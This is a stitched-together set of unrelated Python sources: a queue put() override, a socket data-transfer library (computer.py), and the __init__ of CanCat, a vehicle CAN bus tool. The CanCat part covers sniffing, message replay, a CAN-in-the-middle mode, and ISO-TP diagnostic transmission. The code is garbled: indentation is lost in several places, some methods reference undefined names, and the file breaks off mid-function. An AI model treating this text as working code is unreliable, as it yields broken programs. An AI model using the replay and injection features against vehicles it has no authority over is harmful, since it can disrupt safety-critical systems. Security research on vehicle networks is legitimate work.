    def put(self, item, block=True, timeout=None, chill=True):
        """Put an item into the queue.
        If optional args 'block' is true and 'timeout' is None (the default),
        block if necessary until a free slot is available. If 'timeout' is
        a non-negative number, it blocks at most 'timeout' seconds and raises
        the Full exception if no free slot was available within that time.
        Otherwise ('block' is false), put an item on the queue if a free slot
        is immediately available, else raise the Full exception ('timeout'
        is ignored in that case).

        With chill=True (the default), the consumer is only notified when the
        queue has grown past chill_until items or max_chill_time has elapsed
        since the last notification; chill=False always notifies.
        """
        # Body mirrors queue.Queue.put, except for the conditional notify at
        # the end (which is why the base class internals are required).
        with self.not_full:
            if self.maxsize > 0:
                if not block:
                    if self._qsize() >= self.maxsize:
                        raise compat.queue.Full
                elif timeout is None:
                    while self._qsize() >= self.maxsize:
                        self.not_full.wait()
                elif timeout < 0:
                    raise ValueError("'timeout' must be a non-negative number")
                else:
                    endtime = time.time() + timeout
                    while self._qsize() >= self.maxsize:
                        remaining = endtime - time.time()
                        if remaining <= 0.0:
                            raise compat.queue.Full
                        self.not_full.wait(remaining)
            self._put(item)
            self.unfinished_tasks += 1
            # Only wake the consumer when explicitly requested, when enough
            # items have accumulated, or when it hasn't been woken for longer
            # than the maximum chill time.
            if (
                not chill
                or self._qsize() > self._chill_until
                or (time.time() - self._last_unchill) > self._max_chill_time
            ):
                self.not_empty.notify()
                self._last_unchill = time.time()
|
computer.py | # Library file on the Computer.
# Must be in the same directory as any file using its functions.
import socket
import struct
import sys
from threading import Thread, Event
from binascii import crc_hqx
class CompTalk:
def __init__(self, host):
# Variables that define the communication
self.buffer = 1024
self.CRCValue = 0x61
# The __init__ mainly searches for and establishes the connection
port = 12345 # Arbitrary, will be reassigned by the connection.
print('Attempting to connect using ', host)
try:
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.bind((host, port))
except:
sys.exit('Client IP Address was not valid. Check that the correct IP address was entered')
try:
print('Waiting for connection from host')
soc.listen(1)
self.conn, addr = soc.accept()
except:
print('Conneciton request timed out.')
print('Connected by ', addr[0])
print('Press [ctrl + C] on Pi to stop\n')
self.dataStream = []
def _flatten( self, array):
# Takes a multi-dimensional array and flattens it to 1 dimension
return sum( ([x] if not isinstance(x, list) else self._flatten(x) for x in array), [] )
def _convert2list( self, list):
# Unpacks and structures the sent data into a list of the correct number of rows/columns/dimensions
dim = []
# Extract the dimensions of the array
# Format: [Number of Dimensions, Length of Dim1, Length of Dim2, ...Length of DimN, ...Data to be unpacked...]
dimLength = list[0]
for i in range(dimLength):
# Add 1 to skip the first element which defines dim length
dim.append(list[i + 1])
values = list[dimLength+1:]
# Define an interator and build structure the remaining data based on the dimensions extracted
self._iterator = 0
return self._recursiveBuild( dim, values)
def _recursiveBuild( self, dimensions, data):
final = []
# If there's still remaining dimensions, must continue unpacking
if (len(dimensions) > 1):
for i in range(dimensions[0]):
final.append(self._recursiveBuild( dimensions[1:], data))
# If you have all the dimensions, begin building the data
else:
self._iterator += dimensions[0]
return data[self._iterator-dimensions[0]:self._iterator]
# Once finished, return the resulting array
return final
def _unpackFmt( self, data):
# Unpacks the format string for a packet
fmtString = ""
numPackets = struct.unpack("I", data[:4])[0]
# Wait to recieve all of the packets
while(numPackets > 1):
d = self._recvAndCheck()
if not data: return 0
data = data + d
numPackets -= 1
# combine the data into one string
for i in range(4, len(data)):
fmtString = str(fmtString + chr(data[i]))
# Comma's will denote new packets, so split based on those
return fmtString.split(',')
def _unpackData( self, formatStr, data):
# Unpacks the recieved raw data based on the format string
dataSize = { 'i':4, 'f':4, 's':1, '?':1 }
numPackets = len(formatStr)
content = []
p = 0 # Packet number
d = 0
while(p < numPackets):
length = 0
firstElement = True
isList = False
isString = False
i = 0 # index in format string
d = 0 # index in data recieved
# Iterate through all expected packets
while (i < len(formatStr[p])):
# Since anayzed 1 digit at a time, this accounts for 2+ digit numbers
if (formatStr[p][i] == '-'):
break
if (formatStr[p][i] == '0'):
break
if (formatStr[p][i].isdigit()):
length = 10 * length + int(formatStr[p][i])
isList = True
# If not a digit then a data type was identified and something needs to be unpacked
else:
if (length == 0):
length = 1
if (formatStr[p][i] == 's'):
isString = True
string = ''
# append all of the characters for this entry to 1 string variable
for temp in range(length):
string = str(string + chr(data[p][d]))
d += 1 # move to next data entry
if (isList and firstElement and (formatStr[p-1][-1] == '-')):
content[-1] = str(content[-1] + string)
else:
content.append(string)
else:
# Append the next length of data to the resulting content
for temp in range(length):
content.append( struct.unpack(formatStr[p][i], data[p][d:(d+dataSize[formatStr[p][i]])])[0])
d += dataSize[formatStr[p][i]]
length = 0
firstElement = False
i += 1
p += 1
if (isList):
final = self._convert2list(content)
elif isString:
final = ''
for t in content:
final += t
else:
final = content[0]
return final
def _recvAndCheck( self):
# Check's the sync byte to make sure the packet was fully recieved.
# Send a response accordingly
d = self.conn.recv(self.buffer + 2)
if (struct.unpack('H', d[-2:])[0] == 0x55AA):
self.conn.sendall(b"Valid.")
return d[:-2]
else:
self.conn.sendall(b"Invalid.")
raise packetException('Communication Error: Packed could not be validated')
def getData(self, showRawData=False):
    """
    Wait for and receive all data in one communication attempt.

    First receives the format-string packet, then one payload packet per
    entry in the format string, and unpacks them into python values.

    :param showRawData: when True, also print buffer size, format string
                        and received content for debugging.
    :returns: the unpacked content, or 0 if any receive came back empty.
    """
    # Wait for the format-string packet
    data = self._recvAndCheck()
    if not data:
        return 0
    formatString = self._unpackFmt(data)
    # Receive the rest of the packets, if any, as identified in the format string
    payload = []
    for i in range(len(formatString)):
        d = self._recvAndCheck()
        # BUG FIX: this used to re-test `data` (the format packet, always
        # truthy here) instead of `d`, so an empty payload packet was
        # never detected.
        if not d:
            return 0
        payload.append(d)
    # Unpack the data
    content = self._unpackData(formatString, payload)
    # Print raw data if requested by the user
    if showRawData:
        print("\nBuffer Size: ", self.buffer, "\nFormat: ")
        # bare excepts kept deliberately: content/format may be a bare
        # scalar that is not iterable
        try:
            [print(f) for f in formatString]
        except:
            print(formatString)
        print("Recieved:")
        try:
            [print(str(c)) for c in content]
        except:
            print(content)
    return content
def streamData(self, showRawData=False):
    """
    Start a continuously refreshing data stream.

    Spawns a daemon listener thread (_waitForStream) that appends every
    received message to self.dataStream.  Returns 1 once started.
    """
    self.dataBuffer = []
    self.dataStream = []
    self.receiveEvt = Event()
    self.streaming = True
    listener = Thread(target=self._waitForStream)
    listener.daemon = True
    self.listen = listener
    listener.start()
    return 1
def _waitForStream(self):
    """
    Listener loop for streamData(): receive messages until self.streaming
    is cleared, appending each result to self.dataStream.
    """
    print('Listening for data...')
    try:
        while self.streaming:
            d = self.getData()
            self.dataStream.append(d)
    except (KeyboardInterrupt, BrokenPipeError):
        # BUG FIX: this called thread.exit(), but the py2 `thread` module
        # is not available here (NameError).  Returning ends this daemon
        # thread just as cleanly.
        return
class packetException(Exception):
    """Raised when a received packet fails sync-word validation (see _recvAndCheck)."""
    pass
__init__.py | import os
import sys
import cmd
import time
import serial
import select
import struct
import threading
import cPickle as pickle
from cancat import iso_tp
# defaults for Linux:
serialdev = '/dev/ttyACM0' # FIXME: if Windows: "COM10" is default
baud = 4000000
# command constants (used to identify messages between
# python client and the CanCat transceiver
CMD_LOG = 0x2f
CMD_LOG_HEX = 0x2e
CMD_CAN_RECV = 0x30
CMD_PING_RESPONSE = 0x31
CMD_CHANGE_BAUD_RESULT = 0x32
CMD_CAN_BAUD_RESULT = 0x33
CMD_CAN_SEND_RESULT = 0x34
CMD_ISO_RECV = 0x35
CMD_SET_FILT_MASK = 0x36
CMD_CAN_MODE_RESULT = 0x37
CMD_CAN_SEND_ISOTP_RESULT = 0x38
CMD_CAN_RECV_ISOTP_RESULT = 0x39
CMD_CAN_SENDRECV_ISOTP_RESULT = 0x3A
CMD_SET_FILT_MASK_RESULT = 0x3B
CMD_PING = 0x41
CMD_CHANGE_BAUD = 0x42
CMD_CAN_BAUD = 0x43
CMD_CAN_SEND = 0x44
CMD_CAN_MODE = 0x45
CMD_CAN_MODE_SNIFF_CAN0 = 0x00 # Start sniffing on can 0
CMD_CAN_MODE_SNIFF_CAN1 = 0x01 # Start sniffing on can 1
CMD_CAN_MODE_CITM = 0x02 # Start CITM between can1 and can2
CMD_CAN_SEND_ISOTP = 0x46
CMD_CAN_RECV_ISOTP = 0x47
CMD_CAN_SENDRECV_ISOTP = 0x48
# result codes the transceiver returns for CAN operations
CAN_RESP_OK = (0)
CAN_RESP_FAILINIT = (1)
CAN_RESP_FAILTX = (2)
CAN_RESP_MSGAVAIL = (3)
CAN_RESP_NOMSG = (4)
CAN_RESP_CTRLERROR = (5)
CAN_RESP_GETTXBFTIMEOUT = (6)
CAN_RESP_SENDMSGTIMEOUT = (7)
CAN_RESP_FAIL = (0xff)
# reverse lookup: result code -> constant name (used in error messages)
CAN_RESPS = { v: k for k,v in globals().items() if k.startswith('CAN_RESP') }
# constants for setting baudrate for the CAN bus
CAN_AUTOBPS = 0
CAN_5KBPS = 1
CAN_10KBPS = 2
CAN_20KBPS = 3
CAN_25KBPS = 4
CAN_31K25BPS = 5
CAN_33KBPS = 6
CAN_40KBPS = 7
CAN_50KBPS = 8
CAN_80KBPS = 9
CAN_83K3BPS = 10
CAN_95KBPS = 11
CAN_100KBPS = 12
CAN_125KBPS = 13
CAN_200KBPS = 14
CAN_250KBPS = 15
CAN_500KBPS = 16
CAN_666KBPS = 17
CAN_1000KBPS = 18
# state constants for the Receiver thread
RXTX_DISCONN = -1
RXTX_SYNC = 0
RXTX_GO = 1
# constants for CANreplay mode
TIMING_FAST = 0
TIMING_REAL = 1
TIMING_INTERACTIVE = 2
# constants for VIEW settings: bitfield flags OR'd into `viewbits` args
VIEW_ASCII = 1<<0
VIEW_COMPARE = 1<<1
VIEW_BOOKMARKS = 1<<2
VIEW_TS_DELTA = 1<<3
VIEW_ENDSUM = 1<<4
VIEW_ALL = VIEW_ASCII | VIEW_COMPARE | VIEW_BOOKMARKS | VIEW_TS_DELTA | VIEW_ENDSUM
# message id's and metadata (soon to be moved into modules)
# per-vendor arbid metadata dicts, currently empty placeholders
GM_messages = {
        }
Ford_messages = {
        }
Chrysler_messages = {
        }
Toyota_messages = {
        }
Honda_messages = {
        }
VW_messages = {
        }
Nissan_messages = {
        }
Mitsubishi_messages = {
        }
Hyundai_messages = {
        }
Kia_messages = {
        }
Suzuki_messages = {
        }
Harley_messages = {
        }
# helper functions for printing log messages from the CanCat Transceiver
def handleLogToScreen(message, canbuf):
    '''Default CMD_LOG handler: echo the raw log message to the screen.'''
    print('LOG: ' + repr(message))
def handleLogHexToScreen(message, canbuf):
    '''Default CMD_LOG_HEX handler: decode a little-endian u32 and print it as hex.'''
    (val,) = struct.unpack("<L", message)
    print('LOG: %x' % val)
def handleCanMsgsDuringSniff(message, canbuf, arbids=None):
    # CMD_CAN_RECV handler used while sniffing: file the message into the
    # CanInterface mailbox, then print it (optionally filtered by arbid).
    idx, ts = canbuf._submitMessage(CMD_CAN_RECV, message)
    # NOTE(review): the mailbox timestamp is immediately replaced with the
    # current time for display -- confirm this is intentional
    ts = time.time()
    arbid, data = canbuf._splitCanMsg(message)
    if arbids:
        # only print messages whose arbitration id is in the filter list
        if arbid in arbids:
            print reprCanMsg(idx, ts, arbid, data)
    else:
        print reprCanMsg(idx, ts, arbid, data)
# handlers wired into every CanInterface unless the caller supplies its own:
# log messages get printed instead of being filed into a mailbox
default_cmdhandlers = {
        CMD_LOG : handleLogToScreen,
        CMD_LOG_HEX: handleLogHexToScreen,
        }
def loadCanBuffer(filename):
    '''
    Load a pickled CAN analysis session from the given file.

    :param filename: path to a file written by CanInterface.saveSessionToFile()
    :returns: the unpickled session object
    '''
    # BUG FIX: the old file()-based one-liner leaked the file handle and
    # opened in text mode; use a context-managed binary open instead.
    # NOTE: pickle.load on untrusted files is unsafe -- only load your own sessions.
    with open(filename, 'rb') as f:
        return pickle.load(f)
def keystop(delay=0):
    '''
    Return nonzero if a keypress is waiting on stdin (POSIX: stdin is
    readable within `delay` seconds; Windows: msvcrt.kbhit()).
    '''
    if os.name == 'posix':
        return len(select.select([sys.stdin],[],[],delay)[0])
    else:
        # BUG FIX: msvcrt was referenced but never imported, so this branch
        # raised NameError on Windows; import it lazily so POSIX systems
        # never need the module.
        import msvcrt
        return msvcrt.kbhit()
class SPECIAL_CASE:
    """Marker class used to build sentinel values with special meaning."""
    pass
# sentinel: repr/print code can use this to indicate a message should be suppressed
DONT_PRINT_THIS_MESSAGE = SPECIAL_CASE
class CanInterface:
    def __init__(self, port=serialdev, baud=baud, verbose=False, cmdhandlers=None, comment='', load_filename=None, orig_iface=None, max_msgs=None):
        '''
        CAN Analysis Workspace.

        Connects to a CanCat transceiver over serial (and/or loads a saved
        session from load_filename) and starts a background receiver thread.
        This can be subclassed by vendor to allow more vendor-specific code
        based on the way each vendor uses the various buses.

        :param port: serial device of the transceiver (guessed when None)
        :param cmdhandlers: cmd-byte -> callback map (default_cmdhandlers if None)
        :param load_filename: previously saved session to load
        :param orig_iface: an existing CanInterface whose state is adopted wholesale
        '''
        # adopting an existing interface takes over all of its state; nothing
        # else to set up in that case
        if orig_iface != None:
            self._consumeInterface(orig_iface)
            return
        self._go = False                      # gate for the receiver loop (see _rxtx)
        self._inbuf = ''                      # raw bytes accumulated off the serial port
        self._trash = []                      # garbage discarded while re-syncing
        self._messages = {}                   # cmd byte -> list of (timestamp, message)
        self._msg_events = {}                 # cmd byte -> threading.Event for new-message wakeups
        self._queuelock = threading.Lock()
        self._max_msgs = max_msgs
        self._shutdown = False
        self.verbose = verbose
        self.port = port
        self._baud = baud
        self._io = None                       # serial.Serial once connected
        self._in_lock = None
        self._out_lock = None
        self.name = port
        self._commsthread = None
        self._last_can_msg = None
        self.bookmarks = []                   # bookmark index -> message index
        self.bookmark_info = {}               # bookmark index -> {'name', 'comment'}
        self.comments = []
        if cmdhandlers == None:
            cmdhandlers = default_cmdhandlers
        self._cmdhandlers = cmdhandlers
        if load_filename != None:
            self.loadFromFile(load_filename)
        # If we specify a file and no port, assume we just want to read the file, only try to guess
        # ports if there is no file specified
        if self.port == None and load_filename == None:
            # getDeviceFile() is defined elsewhere in the package; it may return None
            self.port = getDeviceFile()
        # No filename, can't guess the port, whatcha gonna do?
        if self.port == None and load_filename == None:
            raise Exception("Cannot find device, and no filename specified. Please try again.")
        if self.port != None:
            self._reconnect()
            self._startRxThread()
def _startRxThread(self):
    '''Spin up the daemon receiver thread running self._rxtx.'''
    self._go = True
    rxthread = threading.Thread(target=self._rxtx)
    rxthread.setDaemon(True)
    self._commsthread = rxthread
    rxthread.start()
def register_handler(self, cmd, handler):
    '''Install `handler` as the callback invoked for command byte `cmd`.'''
    self._cmdhandlers[cmd] = handler
def remove_handler(self, cmd):
    '''Disable the callback for command byte `cmd`; its messages get mailboxed instead.'''
    self._cmdhandlers[cmd] = None
def _consumeInterface(self, other):
    '''
    Take over another CanInterface's entire state (messages, port, locks, ...).
    Stops the other interface's receiver loop first and, if it had a
    receiver thread, starts a fresh one for this instance.
    '''
    other._go = False
    for attrname, attrval in vars(other).items():
        setattr(self, attrname, attrval)
    if other._commsthread != None:
        self._startRxThread()
def _reconnect(self, port=None, baud=None):
    '''
    Attempt to connect/reconnect to the CanCat Transceiver
    '''
    # NOTE(review): the port/baud parameters are accepted but ignored;
    # self.port / self._baud are always used -- confirm intent.
    if self.port == None and port == None:
        print "cannot connect to an unspecified port"
        return
    if self._io != None:
        self._io.close()
    self._io = serial.Serial(port=self.port, baudrate=self._baud, dsrdtr=True)
    self._io.setDTR(True)
    # clear all locks and free anything waiting for them
    if self._in_lock != None:
        while self._in_lock.locked_lock():
            self._in_lock.release()
            time.sleep(.01)
    self._in_lock = threading.Lock()
    if self._out_lock != None:
        while self._out_lock.locked_lock():
            self._out_lock.release()
            time.sleep(.01)
    self._out_lock = threading.Lock()
    # give the device a moment to settle after DTR toggling
    time.sleep(1)
    return self._io
def __del__(self):
'''
Destructor, called when the CanInterface object is being garbage collected
'''
if isinstance(self._io, serial.Serial):
print "shutting down serial connection"
self._io.close()
self._shutdown = True
if self._commsthread != None:
self._commsthread.wait()
def clearCanMsgs(self):
    '''
    Clear out all messages currently received on the CAN bus, allowing
    a fresh analysis session without creating a new object/connection.

    Returns the list of messages that were cleared.
    '''
    return self.recvall(CMD_CAN_RECV)
def _rxtx(self):
    '''
    Receiver thread runner.  Internal use only.

    Processes data from the CanCat transceiver, parses and places messages
    into correct mailboxes and/or hands off to pre-configured handlers.

    Wire format: '@' <size:u8> <cmd:u8> <payload...>; the state machine
    alternates between RXTX_SYNC (hunting for '@') and RXTX_GO (consuming
    a full packet).
    '''
    self._rxtx_state = RXTX_SYNC
    while not self._shutdown:
        try:
            # _go is the pause gate (cleared while another interface consumes us)
            if not self._go:
                time.sleep(.04)
                continue
            if self.verbose > 4:
                if self.verbose > 5:
                    print "STATE: %s" % self._rxtx_state
                else:
                    sys.stderr.write('.')
            # try to reconnect to disconnected unit (FIXME: not working right yet)
            if self._rxtx_state == RXTX_DISCONN:
                print "FIXME: reconnect disconnected serial port..."
                time.sleep(1)
                self._reconnect()
                self._rxtx_state = RXTX_SYNC
                continue
            # fill the queue ##########################################
            self._in_lock.acquire()
            try:
                char = self._io.read()
            except serial.serialutil.SerialException, e:
                self.errorcode = e
                self.log("serial exception")
                if "disconnected" in e.message:
                    self._io.close()
                    self._rxtx_state = RXTX_DISCONN
                continue
            finally:
                if self._in_lock.locked_lock():
                    self._in_lock.release()
            self._inbuf += char
            #self.log("RECV: %s" % repr(self._inbuf), 4)
            ##########################################################
            # FIXME: should we make the rest of this a separate thread, so we're not keeping messages from flowing?
            # ====== it would require more locking/synchronizing...
            # make sure we're synced: discard garbage up to the next '@'
            if self._rxtx_state == RXTX_SYNC:
                if self._inbuf[0] != "@":
                    self._queuelock.acquire()
                    try:
                        idx = self._inbuf.find('@')
                        if idx == -1:
                            self.log("sitting on garbage...", 3)
                            continue
                        trash = self._inbuf[:idx]
                        self._trash.append(trash)
                        self._inbuf = self._inbuf[idx:]
                    finally:
                        self._queuelock.release()
                self._rxtx_state = RXTX_GO
            # handle buffer if we have anything in it
            if self._rxtx_state == RXTX_GO:
                # need at least '@' + size + cmd before a packet can exist
                if len(self._inbuf) < 3: continue
                if self._inbuf[0] != '@':
                    self._rxtx_state = RXTX_SYNC
                    continue
                pktlen = ord(self._inbuf[1]) + 2 # <size>, doesn't include "@"
                if len(self._inbuf) >= pktlen:
                    self._queuelock.acquire()
                    try:
                        cmd = ord(self._inbuf[2]) # first bytes are @<size>
                        message = self._inbuf[3:pktlen]
                        self._inbuf = self._inbuf[pktlen:]
                    finally:
                        self._queuelock.release()
                    #if we have a handler, use it
                    cmdhandler = self._cmdhandlers.get(cmd)
                    if cmdhandler != None:
                        cmdhandler(message, self)
                    # otherwise, file it
                    else:
                        self._submitMessage(cmd, message)
                    self._rxtx_state = RXTX_SYNC
        except:
            # keep the receiver alive no matter what; report when verbose
            if self.verbose:
                sys.excepthook(*sys.exc_info())
def _submitMessage(self, cmd, message):
    '''
    submits a message to the cmd mailbox.  creates mbox if doesn't exist.
    *threadsafe*

    Returns (index_of_new_message, timestamp).
    '''
    timestamp = time.time()
    self._queuelock.acquire()
    try:
        mbox = self._messages.get(cmd)
        if mbox == None:
            # first message for this cmd: create the mailbox and its
            # new-message event (used by genCanMsgs tail mode)
            mbox = []
            self._messages[cmd] = mbox
            self._msg_events[cmd] = threading.Event()
        mbox.append((timestamp, message))
        self._msg_events[cmd].set()
    except Exception, e:
        # NOTE(review): if the exception fires before mbox is assigned,
        # the return below raises NameError -- confirm acceptable
        self.log("_submitMessage: ERROR: %r" % e, -1)
    finally:
        self._queuelock.release()
    return len(mbox)-1, timestamp
def log(self, message, verbose=2):
'''
print a log message. Only prints if CanCat's verbose setting >=verbose
'''
if self.verbose >= verbose:
print "%.2f %s: %s" % (time.time(), self.name, message)
def recv(self, cmd, wait=None):
    '''
    Warning: Destructive:
        removes a message from a mailbox and returns it.
        For CMD_CAN_RECV mailbox, this will alter analysis results!

    Polls the mailbox for up to `wait` seconds.
    Returns (timestamp, message), or (None, None) when nothing arrived.
    '''
    # BUG FIX: wait=None used to be compared directly against a float,
    # which silently meant "don't wait" on py2 and raises TypeError on
    # py3; make the no-wait behavior explicit.
    if wait == None:
        wait = 0
    start = time.time()
    while (time.time() - start) < wait:
        mbox = self._messages.get(cmd)
        if mbox != None and len(mbox):
            self._queuelock.acquire()
            try:
                timestamp, message = mbox.pop(0)
            finally:
                self._queuelock.release()
            return timestamp, message
        time.sleep(.01)
    return None, None
def recvall(self, cmd):
    '''
    Warning: Destructive:
        removes ALL messages from a mailbox and returns them.
        For CMD_CAN_RECV mailbox, this is like getting a new
        analysis session.
    '''
    mbox = self._messages.get(cmd)
    if mbox == None:
        return []
    self._queuelock.acquire()
    try:
        drained = list(mbox)
        self._messages[cmd] = []
    finally:
        self._queuelock.release()
    return drained
def _inWaiting(self, cmd):
    '''Return how many messages are waiting in the given cmd mailbox.'''
    mbox = self._messages.get(cmd)
    return 0 if mbox == None else len(mbox)
def _send(self, cmd, message):
    '''
    Send a message to the CanCat transceiver (not onto the CAN bus).
    Frame layout: 2-byte big-endian length (len(message) + 3), then the
    command byte, then the payload.
    '''
    hdr = struct.pack(">H", len(message) + 3) # 2 byte Big Endian
    frame = hdr + chr(cmd) + message
    self.log("XMIT: %s" % repr(frame), 4)
    self._out_lock.acquire()
    try:
        self._io.write(frame)
    finally:
        self._out_lock.release()
    # FIXME: wait for response?
def CANrecv(self, count=1):
    '''
    Warning: Destructive:
        removes messages from the received CAN messages and yields them.
        == This will alter analysis results! ==

    count=-1 means "everything currently in the mailbox".
    '''
    if count == -1:
        count = self.getCanMsgCount()
    for _ in range(count):
        yield self.recv(CMD_CAN_RECV)
def CANxmit(self, arbid, message, extflag=0, timeout=3, count=1):
'''
Transmit a CAN message on the attached CAN bus
Currently returns the *last* result
'''
msg = struct.pack('>I', arbid) + chr(extflag) + message
for i in range(count):
self._send(CMD_CAN_SEND, msg)
ts, result = self.recv(CMD_CAN_SEND_RESULT, timeout)
if result == None:
print "CANxmit: Return is None!?"
return None
resval = ord(result)
if resval != 0:
print "CANxmit() failed: %s" % CAN_RESPS.get(resval)
return resval
def ISOTPxmit(self, tx_arbid, rx_arbid, message, extflag=0, timeout=3, count=1):
'''
Transmit an ISOTP can message. tx_arbid is the arbid we're transmitting,
and rx_arbid is the arbid we're listening for
'''
msg = struct.pack('>IIB', tx_arbid, rx_arbid, extflag) + message
for i in range(count):
self._send(CMD_CAN_SEND_ISOTP, msg)
ts, result = self.recv(CMD_CAN_SEND_ISOTP_RESULT, timeout)
if result == None:
print "ISOTPxmit: Return is None!?"
resval = ord(result)
if resval != 0:
print "ISOTPxmit() failed: %s" % CAN_RESPS.get(resval)
return resval
def ISOTPrecv(self, tx_arbid, rx_arbid, extflag=0, timeout=3, count=1, start_msg_idx=None):
    '''
    Receives an ISOTP can message.  This function just causes
    the hardware to send the appropriate flow control command
    when an ISOTP frame is received from rx_arbid, using
    tx_arbid for the flow control frame.  The ISOTP frame
    itself is then pieced together from the received can messages.
    '''
    if start_msg_idx is None:
        start_msg_idx = self.getCanMsgCount()
    # set the CANCat to respond to Flow Control messages
    resval = self._isotp_enable_flowcontrol(tx_arbid, rx_arbid, extflag)
    # BUG FIX: this called self._getIsoTpMsg(), which does not exist; the
    # implemented helper is _isotp_get_msg() (same keyword arguments)
    msg = self._isotp_get_msg(rx_arbid, start_index=start_msg_idx, timeout=timeout)
    return msg
def _isotp_enable_flowcontrol(self, tx_arbid, rx_arbid, extflag):
msg = struct.pack('>IIB', tx_arbid, rx_arbid, extflag)
self._send(CMD_CAN_RECV_ISOTP, msg)
ts, result = self.recv(CMD_CAN_RECV_ISOTP_RESULT, timeout)
if result == None:
print "_isotp_enable_flowcontrol: Return is None!?"
resval = ord(result)
if resval != 0:
print "_isotp_enable_flowcontrol() failed: %s" % CAN_RESPS.get(resval)
return resval
def ISOTPxmit_recv(self, tx_arbid, rx_arbid, message, extflag=0, timeout=3, count=1, service=None):
'''
Transmit an ISOTP can message, then wait for a response.
tx_arbid is the arbid we're transmitting, and rx_arbid
is the arbid we're listening for
'''
currIdx = self.getCanMsgCount()
msg = struct.pack('>II', tx_arbid, rx_arbid) + chr(extflag) + message
for i in range(count):
self._send(CMD_CAN_SENDRECV_ISOTP, msg)
ts, result = self.recv(CMD_CAN_SENDRECV_ISOTP_RESULT, timeout)
if result == None:
print "ISOTPxmit: Return is None!?"
resval = ord(result)
if resval != 0:
print "ISOTPxmit() failed: %s" % CAN_RESPS.get(resval)
msg = self._isotp_get_msg(rx_arbid, start_index = currIdx, service = service, timeout = timeout)
return msg
def _isotp_get_msg(self, rx_arbid, start_index=0, service=None, timeout=None):
    '''
    Internal Method to piece together a valid ISO-TP message from received CAN packets.

    Polls the capture (from start_index) for frames on rx_arbid until a
    complete ISO-TP message decodes, optionally requiring it to match the
    given UDS `service` byte (0x7f error responses are also returned).
    Returns the message, or None on timeout.
    '''
    found = False       # NOTE(review): found/msg_found below are never read
    complete = False
    starttime = lasttime = time.time()
    while not complete and (not timeout or (lasttime-starttime < timeout)):
        msgs = [msg for msg in self.genCanMsgs(start=start_index, arbids=[rx_arbid])]
        if len(msgs):
            try:
                # Check that the message is for the expected service, if specified
                arbid, msg, count = iso_tp.msg_decode(msgs)
                if ord(msg[0]) == 0x7e:  # response for TesterPresent... ignore
                    # skip past the TesterPresent response and keep looking
                    start_index = msgs[count-1][0] + 1
                elif service is not None:
                    # Check if this is the right service, or there was an error
                    if ord(msg[0]) == service or ord(msg[0]) == 0x7f:
                        msg_found = True
                        return msg
                    print "Hey, we got here, wrong service code?"
                    print msg.encode('hex')
                    start_index = msgs[count-1][0] + 1
                else:
                    msg_found = True
                    return msg
            except iso_tp.IncompleteIsoTpMsg, e:
                #print e # debugging only, this is expected
                pass
        time.sleep(0.1)
        lasttime = time.time()
        #print "_isotp_get_msg: status: %r - %r (%r) > %r" % (lasttime, starttime, (lasttime-starttime), timeout)
    print "_isotp_get_msg: Timeout: %r - %r (%r) > %r" % (lasttime, starttime, (lasttime-starttime), timeout)
    return None
def CANsniff(self, start_msg=None, arbids=None, advfilters=[], maxmsgs=None):
    '''
    Print messages in real time.

    start_msg - first message to print
        (None: the next message captured, 0: first message since starting CanCat)
    arbids - list of arbids to print (others will be ignored)
    advfilters - list of python code to eval for each message (message context provided)
        eg. ['pf==0xeb', 'sa==0', 'ps & 0xf']
        will print TP data message from source address 0 if the top 4 bits of PS
        are set.

        Expressions are evaluated from left to right in a "and" like fashion.  If any
        expression evaluates to "False" and the message will be ignored.

        Variables mapped into default namespace:
            'arbid'
            'id'
            'ts'
            'data'

        J1939 adds 'pgn', 'pf', 'ps', 'edp', 'dp', 'sa'

        (this description is true for all advfilters, not specifically CANsniff)

    Stops after maxmsgs messages, or when a key is pressed.
    '''
    count = 0
    # tail=True makes the generator block waiting for new messages
    msg_gen = self.reprCanMsgsLines(start_msg=start_msg, arbids=arbids, advfilters=advfilters, tail=True)
    while True:
        if maxmsgs != None and maxmsgs < count:
            return
        line = msg_gen.next()
        print line
        count += 1
        # a keypress ends the sniff session
        if keystop():
            break
def CANreplay(self, start_bkmk=None, stop_bkmk=None, start_msg=0, stop_msg=None, arbids=None, timing=TIMING_FAST):
    '''
    Replay packets between two bookmarks (or two message indexes).

    timing = TIMING_FAST: just slam them down the CAN bus as fast as possible
    timing = TIMING_REAL: send the messages using similar timing to how they
                were received
    timing = TIMING_INTERACTIVE: wait for the user to press Enter between each
                message being transmitted
    '''
    # bookmark arguments (when given) take precedence over raw indexes
    if start_bkmk != None:
        start_msg = self.getMsgIndexFromBookmark(start_bkmk)
    if stop_bkmk != None:
        stop_msg = self.getMsgIndexFromBookmark(stop_bkmk)
    last_time = -1
    newstamp = time.time()
    for idx,ts,arbid,data in self.genCanMsgs(start_msg, stop_msg, arbids=arbids):
        # delta_correction compensates for time we spent transmitting/prompting
        laststamp = newstamp
        newstamp = time.time()
        delta_correction = newstamp - laststamp
        if timing == TIMING_INTERACTIVE:
            char = raw_input("Transmit this message? %s (Y/n)" % reprCanMsg(idx, ts, arbid, data))
            if char is not None and len(char) > 0 and char[0] == 'n':
                return
        elif timing == TIMING_REAL:
            if last_time != -1:
                # reproduce the original inter-message gap, minus overhead
                delta = ts - last_time - delta_correction
                if delta >= 0:
                    time.sleep(delta)
            last_time = ts
        self.CANxmit(arbid, data)
        if timing == TIMING_INTERACTIVE:
            print "Message transmitted"
def setCanBaud(self, baud_const=CAN_500KBPS):
    '''
    set the baud rate for the CAN bus.  this has nothing to do with the
    connection from the computer to the tool.  baud_const is one of the
    CAN_*KBPS constants defined at module level.
    '''
    self._send(CMD_CAN_BAUD, chr(baud_const))
    response = self.recv(CMD_CAN_BAUD_RESULT, wait=30)
    # retry until the transceiver reports success ('\x01')
    # NOTE(review): if the device never answers, recv returns (None, None)
    # and this loop retries forever -- confirm acceptable
    while(response[1] != '\x01'):
        print "CAN INIT FAILED: Retrying"
        response = self.recv(CMD_CAN_BAUD_RESULT, wait=30)
def setCanMode(self, mode):
'''
Sets the desired operation mode. Note that just setting the operational mode
does not change anything on the hardware, after changing the mode you must change
the baud rate in order to properly configure the hardware
'''
CAN_MODES = { v: k for k,v in globals().items() if k.startswith('CMD_CAN_MODE_') and k is not 'CMD_CAN_MODE_RESULT' }
if mode not in CAN_MODES:
print "{} is not a valid can mode. Valid modes are:".format(mode)
for k in CAN_MODES:
print "{} ({})".format(CAN_MODES[k], k)
else:
self._send(CMD_CAN_MODE, chr(mode))
response = self.recv(CMD_CAN_MODE_RESULT, wait=30)
while(response[1] != '\x01'):
print "CAN INIT FAILED: Retrying"
